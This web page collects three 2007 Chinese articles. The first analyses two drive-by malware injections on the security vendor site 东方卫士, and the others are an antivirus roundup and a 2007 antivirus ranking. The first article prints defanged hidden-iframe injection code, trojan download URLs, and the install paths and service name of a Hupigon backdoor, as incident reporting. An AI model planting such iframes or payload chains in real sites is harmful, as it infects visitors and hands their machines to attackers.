东方卫士被挂马 安全网站安全谁来保证

东方卫士被挂马 安全网站安全谁来保证

作者：T木　来源：赛迪网

【编者按：为安全起见，文中“http”均被替换为“hxxp”，“”均被替换为“[]”，特此说明。】

前两天有网友反映国内知名的安全网站东方卫士再次被挂载木马，这已经是东方卫士第二次暴露出存在安全隐患。

回顾

在此之前就曾发生过一次东方卫士网站首页（hxxp://www.i110.com）存在恶意代码引用的事件，如果用户没有安装过微软的MS07-004补丁程序，并且使用IE浏览器访问上述页面的话，就会感染木马病毒。

技术分析：

1. 东方卫士网站首页代码中，包含了一处对恶意网页的引用语句：

[iframe src=hxxp://***.ch/ook.html width=0 height=0][/iframe]

如图1：



图1

2.这个被引用的恶意网页中包含了利用MS07-004漏洞的代码，使得系统能够自动下载hxxp://***.ch/xia.exe（Trojan-Downloader.Win32.agent.ddz）到本地，并运行。

3.xia.exe是个木马下载器，该木马复制自身到%system32%目录下，命名为wdfmg1r32.exe，运行后下载灰鸽子病毒hxxp://***.li/2.exe（Backdoor.Win32.Hupigon.cpb）。

4.2.exe是灰鸽子病毒最新变种，采用RootKit技术编写，隐藏进程。它复制自身到%system32%目录下，命名为system32.exe，该病毒运行后会释放文件到 %WinDir%\svchost.exe，文件大小为381440字节，并创建下面服务：

服务名：Net work nois

服务描述：Net work nois

服务程序：C:\WINNT\svchost.exe

另外还会下载hxxp://lxn2wyf8899.3322.org/ip.txt到本地系统临时目录下。ip.txt包含的内容为：

hxxp://221.215.170.192:5600/wwwroot/（该IP对应地址为：山东省青岛市(李

沧区)网通ADSL）

染毒电脑将被黑客远程完全控制，这些操作可能是任意文件操作、注册表操作、键盘记录、下载执行远程程序、任意网络操作甚至远程开机摄像头监控等。

再次被挂马

而这一次，在东方卫士主页上，通过查看页面源代码，可以看到网页中被插入一条“[ iframe src=”指令，该指令将隐藏打开一个新的页面，这个页面伪造了浏览器无法开的错误网页，并在后台隐藏打开三个页面，进行木马下载。

打开的隐藏页面代码：

[iframe src=hxxp://www.****.cn/33/Reflector/index.htm width=0

height=0 frameborder=0][/iframe]

在打开的伪造错误页面中会打开三个网页：

[iframe src="hxxp://www.****.cn/33/Reflector/4.htm" width="0"

height="0" frameborder="0"][/iframe]

[iframe src="hxxp://www.****.cn/33/Reflector/2.htm" width="0" height="0" frameborder="0"]

[/iframe]

[iframe src="hxxp://www.*****.com/wm/20/5.htm" width="0" height="0" frameborder="0"]

[/iframe]

下载木马：

hxxp://www.****.cn/33/Reflector/1.exe（无效）

hxxp://www.*****.com/0.exe



图2



图3

再一却又再二，是否还会再三再四

我们常说“再一再二，不可再三再四”。作为防护先锋的安全网站，其在用户心目中的可信度、影响度都是极高的，他们任何一次疏忽所带来的危害性都远大于木马病毒自身所造成的破坏。第一次发生网站被挂载木马的事件后，相信东方卫士应该已经采取了相应的措施。但挂马事件却能够再次发生，这就需要引起我们的警惕与反思了。

再次挂马，说明在“矛”与“盾”的斗争中，“矛”又一次的占据了上风。同时，东方卫士网站一而的再被挂马，除了系统自身依然存在尚未发现的漏洞外，其在自身网站的安全监控上也应当还存在着一定的、可被利用的缺陷。

在以前的文章中我们曾提到CNN由于未能及时更新它的防毒软件，遭到了一种“本可以被及时检测到”蠕虫病毒的攻击。“矛”与“盾”永远都是并存的，不可能出现某一个完全盖过另一个的情况，只能是或者二者并存、或者二者同消失。也就是说，二次挂马事件的出现，除了是因为出现了新的“矛”，更是因为“盾”的上面再一次出现了漏洞，给了“矛”以可乘之机。

有则改之，出现了问题并不可怕，怕的是不知道这个问题是如何出现的，怕的是我们不知道如何去防范、避免问题的再次出现。

安全网站它代表的不仅仅是一个公司、一个集团，它更是网络安全斗争的最前沿。当它连自身的安全都无法保证时，又让普通用户去如何面对日趋危险的网络世界，又让普通用户去如何知道除了自己还有谁能来帮助他抵御网络威胁的入侵。

当安全网站也被击倒了，我们还能信任谁！安全网站的安全谁来保证？

相关资料

MS07-004漏洞：是Microsoft公司多个版本的操作系统对矢量标记语言（VML）的支持存在整数溢出，导致可以执行任意指令，使的远程攻击者可以利用此漏洞控制用户机器。

东方卫士：交大铭泰信息安全公司，国内知名信息安全厂商，该公司提供《东方卫士》系列防病毒产品、数据保护、无毒网关产品、防垃圾邮件产品、网络设备及系统集成和 OEM 定制服务。

保障安全 杀毒软件让你的电脑更坚强

作者：lvvl　来源：赛迪网安全社区

在享受互联网为工作和生活带来便利的同时，人们也不可避免地面临着各种病毒的滋扰。

病毒和杀毒软件就像矛和盾，面对种类不断变化和杀伤力不断增强的病毒，电脑系统、商业机密、个人隐私面临着巨大的威胁，采取适合自己的防杀病毒的工具也就成为人们有效防护网络安全的盾牌。该选择怎样的杀毒软件来保护你的电脑呢？现在的杀软更新真是快，2006的硝烟尚未散去，国产三巨头的2007版本便粉墨登场了。看看在对几款主流杀毒软件做出的比较后，你是不是会更好地选择了呢？

国内杀毒软件

金山毒霸 2007

该软件最强悍的功能就是加入了杀壳的功能。加壳的病毒木马一直是国内的杀毒软件检测不出来的，金山毒霸2007这一特点无疑为其增添不少魅力。

金山毒霸2007是一款功能强大、方便易用的个人及家庭首选反病毒产品，包括金山毒霸、金山网镖、金山反间谍和金山漏洞修复。金山毒霸脱壳引擎模块的发布，大幅度改善了金山毒霸对已知计算机病毒被人为加壳后的查杀能力，以及由于壳的原因带来的对已知计算机病毒查杀能力的问题。

江民杀毒软件KV2007

可有效清除20多万种已知计算机病毒、蠕虫、木马、黑客程序、网页病毒、邮件病毒、脚本病毒等，全方位主动防御未知病毒，新增流氓软件清理功能。

新推出第三代BOOTSCAN系统启动前杀毒功能支持全中文菜单式操作，使用更方便，杀毒更彻底。

新增可升级光盘启动杀毒功能，可在系统瘫痪状态下从光盘启动电脑并升级病毒库进行杀毒。该软件还具有反黑客、反木马、漏洞扫描、垃圾邮件识别、硬盘数据恢复、网银网游密码保护、IE助手、系统诊断、文件粉碎、可疑文件强力删除、反网络钓鱼等十二大功能。

瑞星杀毒软件2007

基于第八代虚拟机脱壳引擎(VUE)研制开发的新一代信息安全产品，能准确查杀各种加壳变种病毒、未知病毒、黑客、木马、恶意网页、间谍软件、流氓软件等有害程序，在病毒处理速度、病毒清除能力、病毒误报率、资源占用率等主要技术指标上实现了新的突破。

用户可以免费下载安装包，具有免费查毒和实时监控功能，无需用户每次都连接到互联网就能免费查毒。

瑞星“虚拟机脱壳”引擎(VUE)，是在计算机中构建一个仿真的运行环境，让加壳病毒在运行中自行脱壳、还原到原始形态，这样就能方便、彻底地将病毒清除掉，它还可以将杀毒软件的病毒库减小1/3，并极大降低对系统资源的占用，使电脑运行得更流畅。

国外杀毒软件

卡巴斯基

Kaspersky(卡巴斯基)杀毒软件来源于俄罗斯，是世界上最优秀、最顶级的网络杀毒软件，查杀病毒性能远高于同类产品。

卡巴斯基杀毒软件具有超强的中心管理和杀毒能力，能真正实现带毒杀毒，提供了广泛的抗病毒解决方案。

该软件提供了所有类型的抗病毒防护：抗病毒扫描仪，监控器，行为阻断和完全检验，支持几乎所有的普通操作系统、e-mail通路和防火墙。

诺顿

诺顿杀毒软件是赛门铁克公司的产品，在国际上具有很高的知名度。诺顿杀毒软件可帮你侦测上万种已知和未知的病毒。

当你从磁盘、网络上、e-mail夹档中开启文件时便会自动侦测文件的安全性，若文件内含病毒，便会立即警告，并作适当的处理。

诺顿具有防御非病毒性威胁，同病毒一样，间谍程序、击键记录程序等非病毒性威胁也会危害电脑的安全。诺顿防病毒可以通过扫描检测到这些威胁，并且针对这些非病毒性威胁提供持续的防护更新。

McAfee

全球最畅销的杀毒软件之一，除了操作界面更新外,也增加了许多新功能。除了帮你侦测和清除病毒，它还有VShield自动监视系统，会常驻在System Tray，当你从磁盘、网络上、e-mail文件夹中开启文件时便会自动侦测文件的安全性，若文件内含病毒，便会立即警告，并作适当的处理。

该软件还支持鼠标右键的快速选单功能，并可用密码将个人的设定锁住，让别人无法乱改你的设定。

系统维护软件

对于初级用户来说，学会了电脑的基本操作，最头痛的就是安全问题。时不时的死机和病毒的侵害、数据的丢失以及网络安全问题都是我们时刻面临的威胁，因此，有必要使用系统维护软件维护系统的正常运行。

维护操作系统

一键还原精灵

一键还原精灵是一种备份C盘的软件，而且可以免费使用。

与ghost手工备份不同的是，一键还原精灵在安装时先在硬盘最末部分分割出一个分区，用来存放备份。为了防止被误删，该分区是隐藏的，在Windows资源管理器里看不到，而且备份文件位于隐藏分区，不受病毒感染。

一旦系统崩溃，使用者按指导操作即可将已备份系统盘符下的所有文件还原。

维护硬盘

Windows优化大师

Windows优化大师小巧的系统信息查看、清理、维护等功能强大，能够全面扫描出计算机中的硬件信息和系统中的垃圾、错误。注册用户还可以得到硬件优化方案，方便快捷地清除扫描出的垃圾和错误。

超级兔子

超级兔子是完整的系统维护工具，可以清理大多数的文件、注册表里面的垃圾，同时还有强力的软件卸载功能，可以清理应用软件在电脑内的所有记录。

其中，超级兔子上网精灵具有IE修复、IE保护、恶意程序检测及清除工能，还能防止其他人浏览网站，阻挡色情网站，以及端口的过滤。超级兔子系统检测可以诊断一台电脑系统的CPU、显卡、硬盘速度，还有磁盘修复及键盘检测功能。

对付流氓软件

360安全卫士

360安全卫士是奇虎公司推出的反流氓软件的得力工具，更新很快，基本上每周都会更新特征库。有流氓软件清理、系统进程监控、系统全面诊断等功能，还辅助有IE历史文件、cook-ie、自动保存的密码清理等功能。

卸载软件

完美卸载

完美卸载软件可以在安装软件时监视系统状态，详细记录新装软件在系统中的存储情况，以及在注册表中的新加项目。到目前为止，完美卸载软件都是免费对外的，并且提供免费实时升级。

顺序依旧 2007年世界顶级杀毒软件排名

作者：fenglimei　来源：赛迪网IT博客

Toptenreviews 已经发布了2007年度的世界杀毒软件排名，与2006年名单相比，这两个排名几乎没有什么区别。也许你会注意到其中惟一的区别是第九名由原来的 eTrust EZ Antivirus 变成了 CA Antivirus，但这两个不同的名字其实还是同一款产品，或许只是因为 CA 公司认为 CA Antivirus 记起来方便得多，于是改了个名字而已。所以，这两个名单还是完全一致的。

2007 年世界顶级杀毒软件排名：

金奖：BitDefender

BitDefender 杀毒软件是来自罗马尼亚的老牌杀毒软件，二十四万超大病毒库，它将为你的计算机提供最大的保护，具有功能强大的反病毒引擎以及互联网过滤技术，为你提供即时信息保护功能，通过回答几个简单的问题，你就可以方便的进行安装，并且支持在线升级。

它包括：1. 永久的防病毒保护；2. 后台扫描与网络防火墙；3. 保密控制；4. 自动快速升级模块；5. 创建计划任务；6. 病毒隔离区。

银奖：Kaspersky

Kaspersky （卡巴斯基）杀毒软件来源于俄罗斯，是世界上最优秀、最顶级的网络杀毒软件，查杀病毒性能远高于同类产品。卡巴斯基杀毒软件具有超强的中心管理和杀毒能力，能真正实现带毒杀毒！提供了一个广泛的抗病毒解决方案。它提供了所有类型的抗病毒防护：抗病毒扫描仪、监控器、行为阻段、完全检验、E-mail 通路和防火墙。它支持几乎是所有的普通操作系统。卡巴斯基控制所有可能的病毒进入端口，它强大的功能和局部灵活性以及网络管理工具为自动信息搜索、中央安装和病毒防护控制提供最大的便利和最少的时间来建构你的抗病毒分离墙。卡巴斯基抗病毒软件有许多国际研究机构、中立测试实验室和 IT 出版机构的证书，确认了卡巴斯基具有汇集行业最高水准的突出品质。

铜奖：F-Secure Anti-Virus

来自 Linux 的故乡芬兰的杀毒软件，集合 AVP、LIBRA、ORION、DRACO 四套杀毒引擎,其中一个就是 Kaspersky 的杀毒内核，而且青出于蓝胜于蓝，个人感觉杀毒效率比 Kaspersky 要好，该软件采用分布式防火墙技术，对网络流行病毒尤其有效。在《PC Utilites》评测中超过 Kaspersky 名列第一，但后来 Kaspersky 增加了扩展病毒库，反超 F-secure。鉴于普通用户用不到扩展病毒库，因此 F-secure 还是普通用户很不错的一个选择。F-Secure AntiVirus 是一款功能强大的实时病毒监测和防护系统，支持所有的 Windows 平台，它集成了多个病毒监测引擎，如果其中一个发生遗漏，就会有另一个去监测。可单一扫描硬盘或是一个文件夹或文件，软件更提供密码的保护性，并提供病毒的信息。

第四名：PC-cillin

趋势科技网络安全个人版集成了包括个人防火墙、防病毒、防垃圾邮件等功能于一体，最大限度地提供对桌面机的保护并不需要用户进行过多的操作。在用户日常使用及上网浏览时，进行"实时的安全防御监控"；内置的防火墙不仅更方便您使用因地制宜的设定，"专业主控式个人防火墙"及"木马程序损害清除还原技术"的双重保障还可以拒绝各类黑客程序对计算机的访问请求；趋势科技全新研发的病毒阻隔技术，包含"主动式防毒应变系统"以及"病毒扫瞄逻辑分析技术"不仅能够精准侦测病毒藏匿与化身并予以彻底清除外，还能针对特定变种病毒进行封锁与阻隔，让病毒再无可趁之机；强有力的"垃圾邮件过滤功能"为您全面封锁不请自来的垃圾邮件。

趋势科技网络安全个人版的诸多功能确保您的电脑系统运作正常，从此摆脱病毒感染的恶梦。

第五名：ESET Nod32

国外很权威的防病毒软件评测给了 NOD32 很高的分数，在全球共获得超过 40 多个奖项，包括Virus Bulletin、PC Magazine、ICSA、Checkmark认证等，更加是全球唯一通过 26 次 VB 100% 测试的防毒软件，高据众产品之榜首！产品线很长，从 DOS、Windows 9x/Me、Windows NT/XP/2000，到Novell Netware Server、Linux、BSD 等，都有提供。可以对邮件进行实时监测，占用内存资源较少，清除病毒的速度效果都令人满意。

第六名：McAfee VirusScan

全球最畅销的杀毒软件之一，McAfee 防毒软件，除了操作介面更新外，也将该公司的 WebScanX 功能合在一起，增加了许多新功能！除了帮你侦测和清除病毒，它还有 VShield 自动监视系统，会常驻在 System Tray，当你从磁盘、网络上、E-mail 夹文件中开启文件时便会自动侦测文件的安全性，若文件内含病毒，便会立即警告，并作适当的处理，而且支持鼠标右键的快速选单功能，并可使用密码将个人的设定锁住让别人无法乱改你的设定。

第七名：Norton AntiVirus

Norton AntiVirus 是一套强而有力的防毒软件，它可帮你侦测上万种已知和未知的病毒，并且每当开机时，自动防护便会常驻在 System Tray，当你从磁盘、网路上、E-mail 夹档中开启档案时便会自动侦测档案的安全性，若档案内含病毒，便会立即警告，并作适当的处理。另外它还附有 LiveUpdate 的功能，可帮你自动连上 Symantec 的 FTP Server 下载最新的病毒码，於下载完后自动完成安装更新的动作。

第八名：AVG Anti-Virus

AVG Anti-Virus 欧洲有名的杀毒软件，AVG Anti-Virus System 功能上相当完整，可即时对任何存取文件侦测，防止电脑病毒感染；可对电子邮件和附加文件进行扫瞄，防止电脑病毒透过电子邮件和附加文件传播； "病毒资料库"里面则记录了一些电脑病毒的特性和发作日期等相关资讯；"开机保护"可在电脑开机时侦测开机型病毒，防止开机型病毒感染。在扫毒方面，可扫瞄磁碟片、硬盘、光盘机外，也可对网络磁碟进行扫瞄。在扫瞄时也可只对磁碟片、硬盘、光盘机上的某个目录进行扫瞄。可扫瞄文件型病毒、巨集病毒、压缩文件 (支持 ZIP、ARJ、RAR 等压缩文件即时解压缩扫描)。在扫瞄时如发现文件感染病毒时会将感染病毒的文件隔离至 AVG Virus VauIt，待扫瞄完成后在一并解毒。支持在线升级。现在提供了最新的免费版供大家使用，安装之前先去官方网站填个表，从回信中得到一个序列号。AVG Anti-Virus 有三个版本(专业、服务器、免费)，其中有个人非营利使用的免费版本，功能完整，但是仅某部份功能是无法设定的，例如扫毒排程只能每天一次等等。

第九名：CA Antivirus

就是反病毒软件 eTrust EZ Antivirus 已经获得了国际计算机安全协会（ICSA:International Computer Security Association）的认证。ICSA 专门负责检测和认证产品对来自病毒及恶意代码的攻击的有效性。CA 公司表示，在 ICSA 的测试中，CA Antivirus 软件甚至连"In-The-Wild"恶性病毒也可以 100% 地检测出来。

CA Antivirus 是一种主要为中小型企业及 SOHO 用户提供解决方案的反病毒软件。该产品支持的操作系统包括 Windows 98、Windows ME、Windows NT 以及 Windows 2000 Professional 等。除此以外，CA 公司还提供包括 CA Antivirus 在内的反病毒解决方案组件"eTrust EZ Armor"。新版本采用全新用户界面，更加易于使用；新的文件隔离功能可有效防止系统文件被误删；改进了帮助系统；增强了"闪动"系统托盘图标功能。

第十名：Norman Virus Control

Norman Virus Control 是欧洲名牌杀毒软件，为了确保您的计算机系统得到最好的保护，Norman 数据安全系统提供了多种防毒工具供您选择，以满足您的不同需要。此产品结合了先进的病毒扫描引擎、启发式分析技术以及宏验证技术，可有效查杀已知和未知病毒。NVC 可以查杀所有类型的病毒，包括文件和引导扇区病毒而无需使用杀毒软件重新启动开机。

第十一名：AntiVirusKi

AntiVirusKit 2006 是德国G-Data公司产品，英文全名是 GData AntiVirusKit，简称 AVK，这是一款采用 KAV 和 BitDefender(BD) 罗马尼亚杀毒软件的双引擎杀毒软件，具有超强的杀毒能力，在国外拥有非常高的知名度，运行速度稳定，具有病毒监控、EMAIL 病毒拦截器、EMAIL 防护、支持在线自动更新等功能，可以阻挡来自互联网的病毒、蠕虫、黑客后门、特洛伊木马、拨号程序、广告软件、间谍软件等所有威胁，支持对压缩文件、电子邮件即时扫描，支持启发式病毒扫描，支持密码保护，有详细的日志方便查询，对计算机提供永久安全防护。AVK 最大优点是，只要病毒或木马录入病毒库，它在病毒运行前拦截，不会出现中毒后再杀毒的情况。 AVK2006 目前病毒库已经超过 33W 卡吧 / BD 双杀毒引擎效果绝对一流！

第十二名：AVAST

第十三名：Panda Titanium

第十四名：F-Prot

第十五名：PCTools AntiVirus

第十六名：ViRobot Expert

第十七名：WinAntiVirus